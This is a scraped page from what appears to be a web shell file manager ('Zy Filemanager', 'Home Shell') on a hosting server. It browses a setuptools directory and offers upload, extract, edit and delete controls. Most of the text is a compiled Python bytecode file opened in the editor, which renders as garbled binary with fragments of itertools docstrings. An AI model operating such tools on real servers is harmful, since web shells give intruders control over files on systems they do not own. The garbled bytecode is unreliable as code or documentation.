⚠️ BACKUP DATA ANDA SECARA TERATUR! File manager ini untuk keperluan teknis.
Zy Filemanager
berang berang bawa gelek berangkat lek !!!
🌙 Dark Mode
🏠 Home Shell
🔄 Refresh
Current Path:
Home Shell
/
opt
/
alt
/
python313
/
lib
/
python3.13
/
site-packages
/
setuptools
/
_vendor
/
more_itertools
/
__pycache__
⬆️ Parent Directory
📁 File Browser
Name
Size
Permissions
Modified Date
Actions
📄
__init__.cpython-313.pyc
(337 bytes)
337 B
0644
📅
✏️
✍️
⬇️
🗑️
📄
more.cpython-313.pyc
(133,294 bytes)
130.17 KB
0644
📅
✏️
✍️
⬇️
🗑️
📄
recipes.cpython-313.pyc
(20,998 bytes)
20.51 KB
0644
📅
✏️
✍️
⬇️
🗑️
📤 Upload Files
Single File
Multiple Files
ZIP Extract
ZIP file will be deleted after extraction
➕ Create New
New Folder
New File
✍️ Editing: recipes.cpython-313.pyc
File: /opt/alt/python313/lib/python3.13/site-packages/setuptools/_vendor/more_itertools/__pycache__/recipes.cpython-313.pyc
Size: 20.51 KB | Last Modified: 2026-01-10 17:56:34
💾 Backup File
🔢 Toggle Line Numbers
� a0bi�? � � � S r SSKrSSKJr SSKJrJrJrJrJ r J r JrJrJ r Jr SSKrSSKJrJrJr / SQrS rS'S jrS rS(S jrS(S jrS r\4S jrS r\rS rS r S r!S(S jr"S r# SSKJ$r% S r$\#R \$l S(S jr'S r(S r)S r*S(S jr+S(S jr,S(S jr-S)S jr.SS.S jr/S(S! jr0S" r1S# r2S$ r3S% r4S& r5g! \& a \#r$ NHf = f)*a Imported from the recipes section of the itertools documentation. All functions taken from the recipes section of the itertools library docs [1]_. Some backward-compatible usability improvements have been made. .. [1] http://docs.python.org/library/itertools.html#recipes � N)�deque) �chain�combinations�count�cycle�groupby�islice�repeat�starmap�tee�zip_longest)� randrange�sample�choice)� all_equal�consume�convolve� dotproduct� first_true�flatten�grouper�iter_except�ncycles�nth�nth_combination�padnone�pad_none�pairwise� partition�powerset�prepend�quantify�#random_combination_with_replacement�random_combination�random_permutation�random_product� repeatfunc� roundrobin�tabulate�tail�take�unique_everseen�unique_justseenc �* � [ [ X5 5 $ )z�Return first *n* items of the iterable as a list. >>> take(3, range(10)) [0, 1, 2] If there are fewer than *n* items in the iterable, all of them are returned. >>> take(10, range(3)) [0, 1, 2] )�listr ��n�iterables ڢ/builddir/build/BUILDROOT/alt-python313-setuptools-69.0.2-3.el8.x86_64/opt/alt/python313/lib/python3.13/site-packages/setuptools/_vendor/more_itertools/recipes.pyr+ r+ <